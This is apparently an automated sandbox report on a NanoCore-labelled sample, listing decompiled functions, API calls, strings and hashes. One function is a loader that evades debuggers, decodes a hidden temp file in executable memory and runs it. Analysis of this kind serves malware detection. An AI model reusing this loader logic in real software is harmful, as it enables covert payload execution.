            • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6EEC1000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85filememorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E6EEC1000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t23;
				void* _t35;
				long _t38;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t35 = _t16;
					if(_t35 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t35, 0);
					_t38 = _t16;
					if(_t38 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
					 *0x6eec3000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t23 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x6eec3000(); // executed
						goto L11;
					}
					do {
						asm("rol cl, 0x2");
						 *((char*)( *0x6eec3000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6eec3000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23;
						_t23 = _t23 + 1;
					} while (_t23 < _v8);
					goto L10;
				}
				return _t12;
			}










            0x6eec1009
            0x6eec1018
            0x6eec101a
            0x6eec101a
            0x6eec102c
            0x6eec1034
            0x6eec1047
            0x6eec1066
            0x6eec106c
            0x6eec1071
            0x6eec10f6
            0x00000000
            0x6eec10f6
            0x6eec107b
            0x6eec1081
            0x6eec1086
            0x6eec10f5
            0x00000000
            0x6eec10f5
            0x6eec1092
            0x6eec1098
            0x6eec109f
            0x00000000
            0x00000000
            0x6eec10aa
            0x6eec10b2
            0x00000000
            0x00000000
            0x6eec10b5
            0x6eec10ba
            0x6eec10ee
            0x6eec10ee
            0x00000000
            0x6eec10f4
            0x6eec10c0
            0x6eec10d3
            0x6eec10e5
            0x6eec10e8
            0x6eec10e9
            0x00000000
            0x6eec10c0
            0x6eec10fa

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6EEC1010
            • DebugBreak.KERNEL32 ref: 6EEC101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6EEC102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6EEC1047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EEC1066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6EEC107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6EEC1092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6EEC10AA
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.669698742.000000006EEC1000.00000020.00020000.sdmp, Offset: 6EEC0000, based on PE: true
            • Associated: 00000008.00000002.669690470.000000006EEC0000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.669714580.000000006EEC2000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.669723056.000000006EEC4000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: c314478f6f4e40384318fc6190c3d30b27ba08e08edfb8903b1c4efaf63681d6
            • Instruction ID: 127d8fd852e8431a457aa86f35660a5c419bb66ce520509ff131fb3b67d2930e
            • Opcode Fuzzy Hash: c314478f6f4e40384318fc6190c3d30b27ba08e08edfb8903b1c4efaf63681d6
            • Instruction Fuzzy Hash: 2421F731540A11ABEB209BF08D6FB9B7B78EB0AF50F205261E674972C4DB749509CA62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405C94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405C94(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x7a15d0;
			}





            0x00405ca2
            0x00405cae
            0x00405cb6
            0x00405cb8
            0x00405cbd
            0x00000000
            0x00405cca
            0x00405cc0
            0x00000000

            APIs
            • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0), ref: 00405CA2
            • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
            • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
            • FindClose.KERNELBASE(00000000), ref: 00405CC0
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ErrorFindMode$CloseFileFirst
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2885216544-3081826266
            • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
            • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
            • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403526, Relevance: 52.7, APIs: 16, Strings: 14, Instructions: 215stringregistrylibraryCOMMON
            Download Yara Rule
            C-Code - Quality: 89%
            			E00403526() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				signed short _t71;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x7a2f88;
				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x79f580;
					"1033" = 0x7830;
					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
					__eflags =  *0x79f580;
					if(__eflags == 0) {
						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
					}
					lstrcatA("1033", _t78);
				} else {
					_t71 =  *_t20(); // executed
					E0040591D("1033", _t71 & 0x0000ffff);
				}
				E004037F2(_t75, _t88);
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
				if(E004055AC(_t88, _t84) != 0) {
					L16:
					if(E004055AC(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059E1(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a2768 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037F2(_t75, __eflags);
							__eflags =  *0x7a3020;
							if( *0x7a3020 != 0) {
								_t31 = E00404E34(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x7a274c;
								if( *0x7a274c == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x79f560, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092B6 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x4092ac = 0;
								GetClassInfoA(0, _t82, 0x7a2720);
								 *0x7a2744 = _t82;
								 *0x4092ac = 0x32;
								RegisterClassA(0x7a2720);
							}
							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x7a2f80;
						 *0x7a2734 = _t28;
						_v20 = 0x624e5f;
						 *0x7a2724 = E00401000;
						 *0x7a2730 =  *0x7a2f80;
						 *0x7a2744 =  &_v20;
						if(RegisterClassA(0x7a2720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x7a1f20;
					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
					_t61 =  *0x7a1f20; // 0x49
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x7a1f21;
						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059BF(_t84, E004054CC(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
							E00405513(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}




























            0x0040352c
            0x0040353d
            0x00403544
            0x00403546
            0x0040355a
            0x0040355f
            0x00403575
            0x0040357a
            0x00403580
            0x00403592
            0x00403592
            0x0040359d
            0x00403548
            0x00403548
            0x00403553
            0x00403553
            0x004035a2
            0x004035ac
            0x004035b5
            0x004035c1
            0x00403647
            0x0040364f
            0x00403651
            0x00403657
            0x00403658
            0x00403658
            0x0040366e
            0x00403674
            0x00403682
            0x00403711
            0x00403719
            0x00403723
            0x00403728
            0x0040372e
            0x004037c0
            0x004037c5
            0x004037c7
            0x004037e3
            0x00000000
            0x004037e3
            0x004037c9
            0x004037cf
            0x004037d7
            0x004037d7
            0x00000000
            0x004037cf
            0x0040373c
            0x00403748
            0x0040374e
            0x00403750
            0x00403752
            0x00403755
            0x0040375e
            0x0040375e
            0x00403766
            0x0040376e
            0x00403770
            0x00403772
            0x00403777
            0x0040377d
            0x00403780
            0x00403786
            0x0040378d
            0x0040378d
            0x004037ac
            0x004037b6
            0x00000000
            0x004037bb
            0x0040371b
            0x0040371d
            0x00000000
            0x00403688
            0x00403688
            0x0040368e
            0x00403698
            0x004036a0
            0x004036aa
            0x004036b0
            0x004036be
            0x004037e8
            0x004037e8
            0x00000000
            0x004037e8
            0x004036c4
            0x004036cd
            0x0040370c
            0x00000000
            0x0040370c
            0x004035c7
            0x004035c7
            0x004035cc
            0x00000000
            0x00000000
            0x004035d6
            0x004035e5
            0x004035ea
            0x004035f1
            0x00000000
            0x00000000
            0x004035f5
            0x004035f7
            0x00403604
            0x00403604
            0x0040360c
            0x00403612
            0x0040363a
            0x00403642
            0x00000000
            0x00403624
            0x00403625
            0x0040362e
            0x00403634
            0x00403635
            0x00000000
            0x00403635
            0x00403630
            0x00403632
            0x00000000
            0x00000000
            0x00000000
            0x00403632
            0x00403612

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • GetUserDefaultUILanguage.KERNELBASE(KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 00403548
              • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
            • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\Desktop\nanocore.exe 0,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
            • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 00403607
            • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
            • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
            • LoadImageA.USER32 ref: 0040366E
            • RegisterClassA.USER32 ref: 004036B5
            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
            • CreateWindowExA.USER32 ref: 00403706
            • ShowWindow.USER32(00000005,00000000), ref: 0040373C
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
            • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
            • GetClassInfoA.USER32 ref: 0040376E
            • GetClassInfoA.USER32 ref: 0040377D
            • RegisterClassA.USER32 ref: 0040378D
            • DialogBoxParamA.USER32 ref: 004037AC
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
            • String ID: 'z$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
            • API String ID: 2262724009-3034644473
            • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
            • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
            • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 81%
            			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				signed int _t56;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				signed int _t73;
				signed int _t78;
				signed int _t79;
				long _t84;
				intOrPtr _t89;
				void* _t91;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				signed int _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\jones\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400);
				_t91 = E00405690(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405513(_t100);
				_t56 = GetFileSize(_t91, 0);
				__eflags = _t56;
				 *0x79d938 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					__eflags =  *0x7a2f8c;
					if( *0x7a2f8c == 0) {
						goto L33;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t102 = GlobalAlloc(0x40, _v28);
						E004030FF( *0x7a2f8c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff);
						_t62 = E00402EBD();
						__eflags = _t62 - _v28;
						if(_t62 == _v28) {
							__eflags = _a4 & 0x00000002;
							 *0x7a2f88 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
								__eflags =  *_t102;
							}
							__eflags = _v48 & 0x00000001;
							 *0x7a3020 =  *_t102 & 0x00000018;
							 *0x7a2f90 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x7a2f94 =  *0x7a2f94 + 1;
								__eflags =  *0x7a2f94;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
								__eflags = _t93;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E00405670(0x7a2fa0, _t102 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E004030FF( *0x789930);
					_t73 = E004030CD( &_v12, 4); // executed
					__eflags = _t73;
					if(_t73 == 0) {
						goto L33;
					}
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						goto L33;
					}
					goto L31;
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
						__eflags = _t101 - _t78;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030CD(0x795938, _t92); // executed
						__eflags = _t79;
						if(_t79 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x7a2f8c;
						if( *0x7a2f8c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t84 = GetTickCount();
									__eflags = _t84 - _t97;
									if(_t84 > _t97) {
										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405CFC(0);
								}
							}
							goto L22;
						}
						E00405670( &_v48, 0x795938, 0x1c);
						_t94 = _v48;
						__eflags = _t94 & 0xfffffff0;
						if((_t94 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_t89 = _v24;
						__eflags = _t89 - _t101;
						if(_t89 > _t101) {
							goto L33;
						}
						_a4 = _a4 | _t94;
						_t95 =  *0x789930; // 0x4e6c2
						__eflags = _a4 & 0x00000008;
						 *0x7a2f8c = _t95;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t24 = _t89 - 4; // 0x1c
							_t101 = _t24;
							__eflags = _t92 - _t101;
							if(_t92 > _t101) {
								_t92 = _t101;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t101 -  *0x79d938; // 0x4e6c6
						if(__eflags < 0) {
							_v16 = E00405D2F(_v16, 0x795938, _t92);
						}
						 *0x789930 =  *0x789930 + _t92;
						_t101 = _t101 - _t92;
						__eflags = _t101;
					} while (_t101 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































            0x00402c42
            0x00402c45
            0x00402c4b
            0x00402c4e
            0x00402c51
            0x00402c64
            0x00402c6a
            0x00402c7d
            0x00402c82
            0x00402c85
            0x00402c8b
            0x00000000
            0x00402c8d
            0x00402c98
            0x00402ca0
            0x00402ca6
            0x00402ca8
            0x00402cad
            0x00402caf
            0x00402dde
            0x00402de0
            0x00402de6
            0x00000000
            0x00000000
            0x00402de8
            0x00402deb
            0x00402e0f
            0x00402e1a
            0x00402e25
            0x00402e2a
            0x00402e2d
            0x00402e2e
            0x00402e2f
            0x00402e31
            0x00402e36
            0x00402e39
            0x00402e5a
            0x00402e5e
            0x00402e64
            0x00402e66
            0x00402e66
            0x00402e66
            0x00402e6e
            0x00402e72
            0x00402e79
            0x00402e7e
            0x00402e80
            0x00402e80
            0x00402e80
            0x00402e88
            0x00402e88
            0x00402e8b
            0x00402e8c
            0x00402e8c
            0x00402e8f
            0x00402e91
            0x00402e91
            0x00402e91
            0x00402e9b
            0x00402ea1
            0x00402eaf
            0x00402eb4
            0x00000000
            0x00402eb4
            0x00402e3c
            0x00000000
            0x00402e3c
            0x00402df3
            0x00402dfe
            0x00402e03
            0x00402e05
            0x00000000
            0x00000000
            0x00402e0a
            0x00402e0d
            0x00000000
            0x00000000
            0x00000000
            0x00402cb5
            0x00402cb5
            0x00402cba
            0x00402cbe
            0x00402cc5
            0x00402cca
            0x00402ccc
            0x00402cce
            0x00402cce
            0x00402cd6
            0x00402cdb
            0x00402cdd
            0x00402e49
            0x00402e4d
            0x00402e52
            0x00402e52
            0x00402e42
            0x00000000
            0x00402e42
            0x00402ce5
            0x00402ceb
            0x00402d6c
            0x00402d70
            0x00402d72
            0x00402d75
            0x00402d7f
            0x00402d85
            0x00402d87
            0x00402da3
            0x00402da3
            0x00402d77
            0x00402d78
            0x00402d78
            0x00402d75
            0x00000000
            0x00402d70
            0x00402cf8
            0x00402cfd
            0x00402d00
            0x00402d06
            0x00000000
            0x00000000
            0x00402d0c
            0x00402d13
            0x00000000
            0x00000000
            0x00402d19
            0x00402d20
            0x00000000
            0x00000000
            0x00402d26
            0x00402d2d
            0x00000000
            0x00000000
            0x00402d2f
            0x00402d36
            0x00000000
            0x00000000
            0x00402d38
            0x00402d3b
            0x00402d3d
            0x00000000
            0x00000000
            0x00402d43
            0x00402d46
            0x00402d4c
            0x00402d50
            0x00402d56
            0x00402d5e
            0x00402d5e
            0x00402d61
            0x00402d61
            0x00402d64
            0x00402d66
            0x00402d68
            0x00402d68
            0x00000000
            0x00402d66
            0x00402d58
            0x00402d5c
            0x00000000
            0x00000000
            0x00000000
            0x00402da6
            0x00402da6
            0x00402dac
            0x00402dbc
            0x00402dbc
            0x00402dbf
            0x00402dc5
            0x00402dc7
            0x00402dc7
            0x00402dcf
            0x00402dd3
            0x00402dd8
            0x00402dd8
            0x00000000
            0x00402dd3

            APIs
            • GetTickCount.KERNEL32 ref: 00402C45
            • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
              • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
              • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
            • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
            • GlobalAlloc.KERNEL32(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
            Strings
            • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E42
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402C37
            • soft, xrefs: 00402D26
            • verifying installer: %d%%, xrefs: 00402D89
            • C:\Users\user\Desktop, xrefs: 00402C51, 00402C5B, 00402C77, 00402C97
            • C:\Users\user\Desktop\nanocore.exe 0, xrefs: 00402C41
            • Inst, xrefs: 00402D19
            • Error launching installer, xrefs: 00402C8D
            • Null, xrefs: 00402D2F
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nanocore.exe 0$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
            • API String ID: 2181728824-2869486257
            • Opcode ID: 070d32362b5f02bfa4bcb615afc2903e7a1d408c6553ea38cbd2013ea11f58e9
            • Instruction ID: 2bc3342fd27a022da09e110317cf5b670322b105189d6b48e3606e9cef6b214d
